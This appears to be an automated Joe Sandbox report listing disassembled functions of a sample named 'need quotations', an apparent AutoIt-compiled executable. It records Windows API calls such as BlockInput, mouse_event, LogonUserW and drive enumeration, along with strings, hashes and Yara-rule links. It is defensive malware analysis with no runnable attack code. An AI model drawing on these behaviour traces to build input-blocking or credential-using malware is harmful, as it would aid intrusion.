Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 5cef5f69c98eba8af537cf2d6304f1f19587a7935aeb0fd8143a969ed5954a0a
Instruction ID: 7f6a723277fed2a5d093751a74823887e6399ee7a0573b2674b559829967b2f2
Opcode Fuzzy Hash: 5cef5f69c98eba8af537cf2d6304f1f19587a7935aeb0fd8143a969ed5954a0a
Instruction Fuzzy Hash: EC21A27A6355108BC72ACF28C491A92F7E5EB95320B248E7DE0E5CB2C0CB74B915CB54

Function 00296AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00296ACA

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 6becdac549e6ea1c780c117eb296873d0567fa3c9e9ce4cca5cda3b5c0816ce0
Instruction ID: 16334c2882e555080f2895152960f272413663f58d888d676296151418f10f6b
Opcode Fuzzy Hash: 6becdac549e6ea1c780c117eb296873d0567fa3c9e9ce4cca5cda3b5c0816ce0
Instruction Fuzzy Hash: BAE04835220204AFC700EF59D408D56B7EDAFB4751F04C827F945D7291DAB4F8148B90

Function 002874BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 002874DE

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 8363edd6de3aa32583afe137acd4d3c610b18fa29e60f33cf2833656677900cb
Instruction ID: 141a0faeb266f3c862acf4ecd38595d386a42391a017b96be6c28b2c091ddefe
Opcode Fuzzy Hash: 8363edd6de3aa32583afe137acd4d3c610b18fa29e60f33cf2833656677900cb
Instruction Fuzzy Hash: E1D017A817E20628E8682B249C0FE760D28B3017C0FA08189B082890C2A8D0E8619232

Function 0027B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0027AD3E), ref: 0027B124

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: ebb740fffc5db8d20bf3a27029ec5624b4e4cc4bac7d46aa23cfa600605441c3
Instruction ID: d884b9bd469faf83ad013e899c1bda4efb27956526b9d8eaa748f008aaad7731
Opcode Fuzzy Hash: ebb740fffc5db8d20bf3a27029ec5624b4e4cc4bac7d46aa23cfa600605441c3
Instruction Fuzzy Hash: 1BD09E321A465EAEDF025FA4EC06EAE3F6AEB04701F448511FA15D50A1C675D532AB50

Function 002BB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 002BB352

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 16d5b0671541e3fa8b54daa301960ebbe99d440867b7280a42609b173d27b292
Instruction ID: 19b45694cd15cfd039486531fcf8b29a5c9647453c86c1e08c193aa2574387db
Opcode Fuzzy Hash: 16d5b0671541e3fa8b54daa301960ebbe99d440867b7280a42609b173d27b292
Instruction Fuzzy Hash: FDC04CB1410109DFC751CBC4DD48EEEBBBCAB04301F1040929105F1110D7709B459B72

Function 00268189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0026818F

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 09415af996504b2dbfdafed29e9d30650c3dfdafe63580658a39838d3ae4ce9e
Instruction ID: ac3de913e0d6ff99694f95fec532859902a1fd31e30528b4b32a9f05b1591fbb
Opcode Fuzzy Hash: 09415af996504b2dbfdafed29e9d30650c3dfdafe63580658a39838d3ae4ce9e
Instruction Fuzzy Hash: D5A0113008020CAB8F002B82FC088883F2CEA002A0B0000A2F80C020208B22A8208A82

Function 0024E3B0 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f6d72c2802e139ed261b5853bd294cc17f94c2f60a329ef54f87eead123def8
Instruction ID: 75ef93cc850a9d0599fbf8bf9e675815b8ce1820af3a4a37af14a8d867eb732b
Opcode Fuzzy Hash: 8f6d72c2802e139ed261b5853bd294cc17f94c2f60a329ef54f87eead123def8
Instruction Fuzzy Hash: 3B22CD70924206CFEF28DF58C480AAEF7B0FF58314F168069E9569B351E371ADA5CB91

Function 002493F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfcabc7ca87c1c1c783989d22de1176bbb74b1977a7050192b844c36dc4347c7
Instruction ID: 33e7b0930037a582813d634757e1bc83f3f4b169bb9351eb4dfd4098e42177e2
Opcode Fuzzy Hash: cfcabc7ca87c1c1c783989d22de1176bbb74b1977a7050192b844c36dc4347c7
Instruction Fuzzy Hash: EB12AE70A20609DFDF08DFA4D985AEEB7F9FF48300F204569E806E7254EB35A964CB54

Function 0024AF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: 5e05672931ae043093fc3de1dd3f6f963574a1bb9590d21560bbaeca20b7ed34
Instruction ID: 5e1573f621a473927c5b612c2160ba6e303b8f79d1177967bbf05f9159e01934
Opcode Fuzzy Hash: 5e05672931ae043093fc3de1dd3f6f963574a1bb9590d21560bbaeca20b7ed34
Instruction Fuzzy Hash: B402D570A20205DFDF19DF68D9816AEB7B5FF48340F148069E80ADB255EB31DA29CB91

Function 002602A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: a0d491ddb5ea04d39c3460afcbf030f1830735b797dcbc91fbc40da3c210c556
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: 3FC1D7322251930ADF6D4A39C5B543FFAA15E917B231A076DD8B3CB5D2EF20C578E620

Function 002606D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: a014f8805d38a3be840aff2a638d41b05f6ed835575dd8d4c15885f8b69d8e0e
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: CBC1C73222519309DF6D4A39C57543FFAA15E92BB231A076DD8B3CB4D6EF20C578E620

Function 0025FA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 05a33a57a358d0097f67c4ad0be757c1a12a1a76fe5293954460c5dfeb880361
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: DAC1C33222509309DF9D4A39D63543EBAA15AA27B731A077DDCB2CB4D6EF30C538D624

Function 0194A9E8 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694616863.0000000001947000.00000040.00000020.00020000.00000000.sdmp, Offset: 01947000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1947000_need quotations.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 65e1843c9823a62344e681a03a17c216e1dc2d6f3f575a61a1d458fdf1398c2f
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 9241D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90

Function 0194A8D8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694616863.0000000001947000.00000040.00000020.00020000.00000000.sdmp, Offset: 01947000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1947000_need quotations.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 2dc62c3fd387aa0d4055922e92eec87434eac01ffe4deefdb466516b634bfdd5
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: D0019278A40109EFCB44DF98C590DAEF7F5FB48310F208599D80AA7301D730AE41DB80

Function 0194A878 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694616863.0000000001947000.00000040.00000020.00020000.00000000.sdmp, Offset: 01947000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1947000_need quotations.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 1c4c75e6dbc89e31cfd81831b0c7a773a1d297d9fa1f2635c80999f955f31d1e
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: CF018078E40109EFDB54DF98C590DAEF7B5FB88210F208599E81AA7301D730AE42DB80

Function 01949248 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694616863.0000000001947000.00000040.00000020.00020000.00000000.sdmp, Offset: 01947000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1947000_need quotations.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 0029A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0029A2FE
DeleteObject.GDI32(00000000), ref: 0029A310
DestroyWindow.USER32 ref: 0029A31E
GetDesktopWindow.USER32 ref: 0029A338
GetWindowRect.USER32(00000000), ref: 0029A33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0029A480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0029A490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0029A4D8
GetClientRect.USER32(00000000,?), ref: 0029A4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0029A51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0029A540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0029A553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0029A55E
GlobalLock.KERNEL32(00000000), ref: 0029A567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0029A576
GlobalUnlock.KERNEL32(00000000), ref: 0029A57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0029A586
GlobalFree.KERNEL32(00000000), ref: 0029A591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0029A5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,002CD9BC,00000000), ref: 0029A5B9
GlobalFree.KERNEL32(00000000), ref: 0029A5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0029A5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0029A60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0029A630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0029A81D

Strings

AutoIt v3, xrefs: 0029A4D0
, xrefs: 0029A7A3
DISPLAY, xrefs: 0029A680
static, xrefs: 0029A518, 0029A66F

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 0310fd9858cbe3abac817919036ea21f43ad4bc861d48d23f020c55256e8ca94
Instruction ID: 0f8471218e2d70922ffa3795e3e735e405087c90e239f72d82748a933ba75c5f
Opcode Fuzzy Hash: 0310fd9858cbe3abac817919036ea21f43ad4bc861d48d23f020c55256e8ca94
Instruction Fuzzy Hash: CC027C71910205EFDB14DFA8DD89EAEBBB9FB48310F148159F905AB2A1C770AD51CFA0

Function 002AD285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 002AD2DB
GetSysColorBrush.USER32(0000000F), ref: 002AD30C
GetSysColor.USER32(0000000F), ref: 002AD318
SetBkColor.GDI32(?,000000FF), ref: 002AD332
SelectObject.GDI32(?,00000000), ref: 002AD341
InflateRect.USER32(?,000000FF,000000FF), ref: 002AD36C
GetSysColor.USER32(00000010), ref: 002AD374
CreateSolidBrush.GDI32(00000000), ref: 002AD37B
FrameRect.USER32(?,?,00000000), ref: 002AD38A
DeleteObject.GDI32(00000000), ref: 002AD391
InflateRect.USER32(?,000000FE,000000FE), ref: 002AD3DC
FillRect.USER32(?,?,00000000), ref: 002AD40E
GetWindowLongW.USER32(?,000000F0), ref: 002AD439

Part of subcall function 002AD575: GetSysColor.USER32(00000012), ref: 002AD5AE
Part of subcall function 002AD575: SetTextColor.GDI32(?,?), ref: 002AD5B2
Part of subcall function 002AD575: GetSysColorBrush.USER32(0000000F), ref: 002AD5C8
Part of subcall function 002AD575: GetSysColor.USER32(0000000F), ref: 002AD5D3
Part of subcall function 002AD575: GetSysColor.USER32(00000011), ref: 002AD5F0
Part of subcall function 002AD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 002AD5FE
Part of subcall function 002AD575: SelectObject.GDI32(?,00000000), ref: 002AD60F
Part of subcall function 002AD575: SetBkColor.GDI32(?,00000000), ref: 002AD618
Part of subcall function 002AD575: SelectObject.GDI32(?,?), ref: 002AD625
Part of subcall function 002AD575: InflateRect.USER32(?,000000FF,000000FF), ref: 002AD644
Part of subcall function 002AD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002AD65B
Part of subcall function 002AD575: GetWindowLongW.USER32(00000000,000000F0), ref: 002AD670
Part of subcall function 002AD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002AD698

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 3e2a55115b2a6623145e47b27ffc758bef09453450d7ffd966208602991ec977
Instruction ID: 5c6e4224f304b6199c2e79c18415acf4f0aa7f55759bbd0d0edeb1ca6b71f863
Opcode Fuzzy Hash: 3e2a55115b2a6623145e47b27ffc758bef09453450d7ffd966208602991ec977
Instruction Fuzzy Hash: 13917171408301BFDB109F64EC08E5BBBA9FF89325F500A29F966961A0DB71E954CF92

Function 0025B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 0025B98B
DeleteObject.GDI32(00000000), ref: 0025B9CD
DeleteObject.GDI32(00000000), ref: 0025B9D8
DestroyIcon.USER32(00000000), ref: 0025B9E3
DestroyWindow.USER32(00000000), ref: 0025B9EE
SendMessageW.USER32(?,00001308,?,00000000), ref: 002BD2AA
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 002BD2E3
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 002BD711

Part of subcall function 0025B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0025B759,?,00000000,?,?,?,?,0025B72B,00000000,?), ref: 0025BA58

SendMessageW.USER32 ref: 002BD758
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 002BD76F
ImageList_Destroy.COMCTL32(00000000), ref: 002BD785
ImageList_Destroy.COMCTL32(00000000), ref: 002BD790

Strings

0, xrefs: 002BD5A5

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 8185c156567c3baeef729c46228eb6b0b2132de93093826e92b7219e8bffada7
Instruction ID: 91a3e0b48db5e47959b6f487fe32bd54221d6bb0282b5b52c3ecc1af27a9db3d
Opcode Fuzzy Hash: 8185c156567c3baeef729c46228eb6b0b2132de93093826e92b7219e8bffada7
Instruction Fuzzy Hash: 96129C30124202DFDB21CF28D888BE9BBE4BF45355F184569F989CB252DB31E865CF91

Function 0028DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0028DBD6
GetDriveTypeW.KERNEL32(?,002DDC54,?,\\.\,002DDC00), ref: 0028DCC3
SetErrorMode.KERNEL32(00000000,002DDC54,?,\\.\,002DDC00), ref: 0028DE29

Strings

1394, xrefs: 0028DDA8
SSD, xrefs: 0028DD50
RAID, xrefs: 0028DDC4
SAS, xrefs: 0028DDD2
\\.\, xrefs: 0028DC2B
Network, xrefs: 0028DD01
SCSI, xrefs: 0028DD93
Unknown, xrefs: 0028DCE3, 0028DD8C
FileBackedVirtual, xrefs: 0028DDF5
MMC, xrefs: 0028DDE7
iSCSI, xrefs: 0028DDCB
Fixed, xrefs: 0028DD0B
CDROM, xrefs: 0028DCF7
Virtual, xrefs: 0028DDEE
Fibre, xrefs: 0028DDB6
SATA, xrefs: 0028DDD9
PhysicalDrive, xrefs: 0028DC67
Removable, xrefs: 0028DD15
USB, xrefs: 0028DDBD
ATAPI, xrefs: 0028DD9A
RAMDisk, xrefs: 0028DCED
ATA, xrefs: 0028DDA1
SSA, xrefs: 0028DDAF

Memory Dump Source

